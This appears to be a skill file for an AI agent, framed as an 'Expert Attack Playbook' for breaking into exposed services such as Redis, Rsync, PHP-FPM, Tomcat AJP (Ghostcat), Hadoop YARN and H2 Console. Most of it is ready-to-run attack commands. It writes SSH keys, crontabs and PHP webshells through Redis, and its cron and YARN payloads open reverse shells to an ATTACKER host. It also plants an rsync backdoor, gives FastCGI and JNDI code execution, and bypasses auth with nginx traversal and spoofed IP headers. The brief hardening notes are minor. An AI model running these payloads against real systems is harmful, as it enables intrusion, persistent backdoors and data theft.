SKILL: Unauthorized Access to Common Services — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert techniques for exploiting unauthenticated or weakly authenticated management services. Covers Redis write-to-RCE, Rsync data theft, PHP-FPM code execution, Ghostcat AJP file read, Hadoop YARN job submission, and H2 Console JNDI. These are infrastructure-level findings distinct from web application vulnerabilities.

0. RELATED ROUTING

ssrf-server-side-request-forgery when these services are reachable via SSRF (e.g., SSRF → Redis)
jndi-injection when H2 Console or similar accepts JNDI connection strings
deserialization-insecure when RMI Registry or T3 protocol is exposed
network-protocol-attacks for layer 2/3 attacks during service enumeration
reverse-shell-techniques for shell payloads after gaining command execution

Comprehensive Port Reference

Also load PORT_SERVICE_MATRIX.md when you need:

Full exploitation matrix organized by port number (20+ services)
Enumeration, brute force, and post-exploitation per service
Quick triage during nmap/masscan output analysis

1. DISCOVERY — PORT SCANNING

nmap -sV -p 6379,873,9000,8009,8088,8082,1099,9200,5984,2375,27017,11211 TARGET

# Key ports:
# 6379  — Redis
# 873   — Rsync
# 9000  — PHP-FPM (FastCGI)
# 8009  — AJP (Tomcat Ghostcat)
# 8088  — Hadoop YARN ResourceManager
# 8082  — H2 Console (or embedded in Spring Boot)
# 1099  — Java RMI Registry
# 9200  — Elasticsearch
# 5984  — CouchDB
# 2375  — Docker API
# 27017 — MongoDB
# 11211 — Memcached

2. REDIS (PORT 6379)

Detection

redis-cli -h TARGET ping
# Response: PONG = unauthenticated access confirmed

redis-cli -h TARGET INFO server
# Returns Redis version, OS, config

Write SSH Authorized Keys

# Generate key pair:
ssh-keygen -t rsa -f redis_rsa

# Write public key to Redis, then dump to authorized_keys:
redis-cli -h TARGET flushall
cat redis_rsa.pub | redis-cli -h TARGET -x set ssh_key
redis-cli -h TARGET config set dir /root/.ssh
redis-cli -h TARGET config set dbfilename authorized_keys
redis-cli -h TARGET save

# Connect:
ssh -i redis_rsa root@TARGET

Write Crontab (Reverse Shell)

redis-cli -h TARGET
> set x "\n\n*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1\n\n"
> config set dir /var/spool/cron/
> config set dbfilename root
> save

Write Webshell

redis-cli -h TARGET
> set webshell "<?php system($_GET['cmd']); ?>"
> config set dir /var/www/html/
> config set dbfilename shell.php
> save
# Access: http://TARGET/shell.php?cmd=id

Master-Slave Replication RCE

Use redis-rogue-server to exploit master-slave replication for loading malicious .so module:

python3 redis-rogue-server.py --rhost TARGET --lhost ATTACKER
# Loads module via SLAVEOF → MODULE LOAD → system.exec

Hardening

requirepass STRONG_PASSWORD
bind 127.0.0.1
protected-mode yes
rename-command CONFIG ""
rename-command FLUSHALL ""

3. RSYNC (PORT 873)

Detection

rsync TARGET::
# Lists available modules (shares) if anonymous access allowed

rsync -av TARGET::MODULE_NAME /tmp/loot/
# Download entire module contents

Exploitation — Write Crontab

# Create reverse shell cron:
echo '*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1' > /tmp/evil_cron

# Upload to target's crontab (if writable module maps to /etc/ or similar):
rsync -av /tmp/evil_cron TARGET::MODULE/cron.d/backdoor

Hardening

# /etc/rsyncd.conf:
auth users = rsync_user
secrets file = /etc/rsyncd.secrets
list = no
hosts allow = 10.0.0.0/8
read only = yes

4. PHP-FPM / FASTCGI (PORT 9000)

Mechanism

PHP-FPM listens for FastCGI requests. If exposed to the network (instead of Unix socket), an attacker can send crafted FastCGI packets to execute arbitrary PHP code.

Exploitation

# Using fcgi_exp or similar tool:
python3 fpm.py TARGET 9000 /var/www/html/index.php -c "<?php system('id'); ?>"

# Key parameters in FastCGI request:
# SCRIPT_FILENAME = path to any existing .php file
# PHP_VALUE = "auto_prepend_file = php://input"  (injects POST body as PHP code)
# PHP_ADMIN_VALUE = "allow_url_include = On"

Key FastCGI Environment Variables for Exploitation

SCRIPT_FILENAME = /var/www/html/index.php   # must point to an existing .php file
PHP_VALUE = auto_prepend_file = php://input  # injects POST body as PHP code
PHP_ADMIN_VALUE = allow_url_include = On     # enables remote inclusion

Via SSRF (gopher)

gopher://TARGET:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00...
# Encoded FastCGI packet
# Tool: Gopherus generates the gopher:// URL
python3 gopherus.py --exploit fastcgi

Hardening

; php-fpm.conf — bind to socket only:
listen = /var/run/php-fpm.sock
; If TCP required, restrict:
listen.allowed_clients = 127.0.0.1

5. GHOSTCAT — AJP (PORT 8009) — CVE-2020-1938

Mechanism

Apache JServ Protocol (AJP) is used between reverse proxy and Tomcat. AJP trusts all incoming data — an attacker connecting directly can set javax.servlet.include.request_uri to read arbitrary files from the webapp directory.

File Read

# Using ajpShooter or similar:
python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read

# Reads any file within the webapp root:
# /WEB-INF/web.xml          — deployment descriptor
# /WEB-INF/classes/*.class  — compiled Java classes
# /WEB-INF/lib/*.jar        — library JARs

File Include → RCE

If a file upload exists (e.g., uploaded JSP disguised as image), AJP can include it as JSP:

python3 ajpShooter.py TARGET 8009 /uploaded_avatar.txt eval
# If the file contains JSP code, it gets executed

Hardening

<!-- server.xml — disable AJP or add secret: -->
<Connector port="8009" protocol="AJP/1.3" secretRequired="true" secret="STRONG_SECRET"/>
<!-- Or remove the AJP connector entirely -->

6. HADOOP YARN RESOURCEMANAGER (PORT 8088)

Detection

curl http://TARGET:8088/cluster
# If accessible → unauthenticated YARN ResourceManager UI

RCE via Application Submission

# Submit a MapReduce application that executes a command:
curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps/new-application
# Returns: {"application-id":"application_xxx_0001"}

curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps \
  -H "Content-Type: application/json" \
  -d '{
    "application-id": "application_xxx_0001",
    "application-name": "test",
    "am-container-spec": {
      "commands": {"command": "/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1"}
    },
    "application-type": "YARN"
  }'

Hardening

Enable Kerberos authentication; restrict network access to management ports.

7. H2 DATABASE CONSOLE

Detection

H2 Console is often enabled in Spring Boot apps via:

spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true

Access: http://TARGET:PORT/h2-console

JNDI Injection via Connection String

In the H2 Console login form, the JDBC URL field accepts JNDI.

BeanFactory + EL bypass (works on Java 8u252+):

# JDBC URL in login form:
javax.naming.InitialContext

# LDAP response attributes:
javaClassName: javax.el.ELProcessor
javaFactory: org.apache.naming.factory.BeanFactory
forceString: x=eval
x: Runtime.getRuntime().exec("id")

Also see jndi-injection for the full JNDI/BeanFactory exploitation flow.

RCE via RUNSCRIPT

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd); return "ok"; }';
CALL EXEC('id');

8. QUICK REFERENCE

# Redis — check auth:
redis-cli -h TARGET ping

# Redis — write webshell:
SET x "<?php system($_GET['c']);?>"
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SAVE

# Rsync — list modules:
rsync TARGET::

# Ghostcat — read web.xml:
python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read

# YARN — submit RCE job:
curl -X POST http://TARGET:8088/ws/v1/cluster/apps/new-application

# H2 — RCE via alias:
CREATE ALIAS EXEC AS '...Runtime.exec...'; CALL EXEC('id');

9. REVERSE PROXY MISCONFIGURATION

Nginx Off-By-Slash Path Traversal

# Vulnerable configuration:
location /static {
    alias /var/www/static/;
}
# Access: /static../etc/passwd → resolves to /var/www/etc/passwd
# The missing trailing slash on location causes path traversal

# Fix: location /static/ (with trailing slash matching alias)

Nginx Missing Root Location

# If no root location defined and alias is used:
# Attacker may access nginx.conf or other server files
GET /..%2f..%2fetc/nginx/nginx.conf HTTP/1.1

X-Forwarded-For / X-Real-IP Trust

# If backend trusts these headers for IP-based auth:
GET /admin HTTP/1.1
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
True-Client-IP: 127.0.0.1

# May bypass IP whitelist for admin panels

Caddy Template Injection

# Caddy with templates enabled:
# If user input reaches Caddy template rendering:
{{.Req.Host}}          → Information disclosure
{{readFile "/etc/passwd"}}  → Local file read via Go template
# This is essentially a Go template injection through proxy config

Useful Tools

yandex/gixy — Nginx configuration analyzer
Raelize/Kyubi — Reverse proxy misconfiguration scanner
GerbenJavado/bypass-url-parser — URL parser confusion tester

unauthorized-access-common-services

SKILL: Unauthorized Access to Common Services — Expert Attack Playbook

0. RELATED ROUTING

Comprehensive Port Reference

1. DISCOVERY — PORT SCANNING

2. REDIS (PORT 6379)

Detection

Write SSH Authorized Keys

Write Crontab (Reverse Shell)

Write Webshell

Master-Slave Replication RCE

Hardening

3. RSYNC (PORT 873)

Detection

Exploitation — Write Crontab

Hardening

4. PHP-FPM / FASTCGI (PORT 9000)

Mechanism

Exploitation

Key FastCGI Environment Variables for Exploitation

Via SSRF (gopher)

Hardening

5. GHOSTCAT — AJP (PORT 8009) — CVE-2020-1938

Mechanism

File Read

File Include → RCE

Hardening

6. HADOOP YARN RESOURCEMANAGER (PORT 8088)

Detection

RCE via Application Submission

Hardening

7. H2 DATABASE CONSOLE

Detection

JNDI Injection via Connection String

RCE via RUNSCRIPT

8. QUICK REFERENCE

9. REVERSE PROXY MISCONFIGURATION

Nginx Off-By-Slash Path Traversal

Nginx Missing Root Location

X-Forwarded-For / X-Real-IP Trust

Caddy Template Injection

Useful Tools